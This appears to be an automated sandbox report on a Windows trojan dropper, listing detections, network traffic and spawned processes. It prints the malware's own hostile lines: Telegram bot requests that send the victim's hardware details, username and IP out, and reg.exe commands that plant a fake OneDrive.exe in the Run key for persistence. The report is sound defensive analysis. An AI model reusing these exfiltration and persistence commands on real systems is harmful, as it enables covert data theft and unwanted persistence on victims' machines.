Windows Analysis Report
68e7a0fa9f7dbbb34bc4bad97690ea72.exe

Overview

General Information

Sample Name: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe
Analysis ID: 620098
MD5: d9079709c37a9977a75123a38cbd6660
SHA1: 0f7af4f8fe342afc826d5b6a7ffb0c145b371c50
SHA256: b6a3b9630a6ed8f626b7fdc083c73a03c57923c1055314bacaa49031c5fa6ae3
Tags: exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Sigma detected: Add file from suspicious location to autostart registry
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Uses the Telegram API (likely for C&C communication)
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses reg.exe to modify the Windows registry
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Virustotal: Detection: 32% Perma Link
Antivirus / Scanner detection for submitted sample
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Avira: detection malicious, Label: TR/Redcap.sblry
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Virustotal: Detection: 39% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe ReversingLabs: Detection: 14%
Antivirus or Machine Learning detection for unpacked file
Source: 9.3.[New]1.exe.2ab0000.0.unpack Avira: Label: TR/ATRAPS.Gen4
Uses 32bit PE files
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406F00 FindFirstFileA, 11_2_00406F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004364E3 FindFirstFileExW, 11_2_004364E3

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe DNS query: name: ipinfo.io
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe DNS query: name: ipinfo.io
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe DNS query: name: ip-api.com
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 04 May 2022 09:04:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org/botTELEG
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20N
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.797490031.0000000006A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com4bkX
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/json
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/json4
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/jsonHt
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/jsonxt
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.entrust.net02
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://ocsp.entrust.net03
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://www.entrust.net/rpa0
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp, json[1].json.11.dr String found in binary or memory: https://ipinfo.io/missingauth
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406590 InternetReadFile, 11_2_00406590
Source: global traffic HTTP traffic detected: GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1Accept: text/*User-Agent: softHost: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Accept: text/*User-Agent: softHost: ipinfo.io
Source: global traffic HTTP traffic detected: GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1Accept: text/*User-Agent: softHost: api.telegram.org
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49753 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: [New]1.exe, 00000009.00000002.428693209.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040535C

System Summary
barindex
PE file contains section with special chars
Source: [New]1.exe.0.dr Static PE information: section name: e5WJl%
Uses 32bit PE files
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Detected potential crypto function
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00406945 0_2_00406945
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040711C 0_2_0040711C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00401000 11_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004031B0 11_2_004031B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042F090 11_2_0042F090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042F2C2 11_2_0042F2C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042C500 11_2_0042C500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042F51F 11_2_0042F51F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0042A59B 11_2_0042A59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0043E70F 11_2_0043E70F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0043585E 11_2_0043585E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_0043597E 11_2_0043597E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00427990 11_2_00427990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00439F59 11_2_00439F59
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A138DD 21_2_00A138DD
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FF3D3 21_2_009FF3D3
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A023D0 21_2_00A023D0
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A11C9A 21_2_00A11C9A
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A0858C 21_2_00A0858C
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FF605 21_2_009FF605
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A137BD 21_2_00A137BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CC370 25_2_011CC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CE2D0 25_2_011CE2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1479 25_2_011C1479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0858 25_2_011C0858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0B30 25_2_011C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1D71 25_2_011C1D71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CCC40 25_2_011CCC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011CC028 25_2_011CC028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C20A8 25_2_011C20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C10A9 25_2_011C10A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1570 25_2_011C1570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0B20 25_2_011C0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C0B6A 25_2_011C0B6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_011C1E21 25_2_011C1E21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_09567530 25_2_09567530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 25_2_09567520 25_2_09567520
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: String function: 009FAE40 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: String function: 00425540 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: String function: 00430E17 appears 167 times
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process Stats: CPU usage > 98%
Uses reg.exe to modify the Windows registry
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File read: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Jump to behavior
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe "C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe"
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process created: C:\Users\user\AppData\Roaming\[New]1.exe C:\Users\user\AppData\Roaming\[New]1.exe
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process created: C:\Users\user\AppData\Roaming\[New]1.exe C:\Users\user\AppData\Roaming\[New]1.exe Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Roaming\[New]1.exe Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Local\Temp\nsp43D.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@18/7@3/3
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar, 0_2_0040216B
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040460D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406940 CreateToolhelp32Snapshot, 11_2_00406940
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_01
Source: 21.3.[New]Salvity_crypted(2).exe.2570000.0.unpack, u0002u2002.cs Cryptographic APIs: 'CreateDecryptor'
Source: 25.2.AppLaunch.exe.400000.0.unpack, u0002u2002.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static file information: File size 5888624 > 1048576
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Uses code obfuscation techniques (call, push, ret)
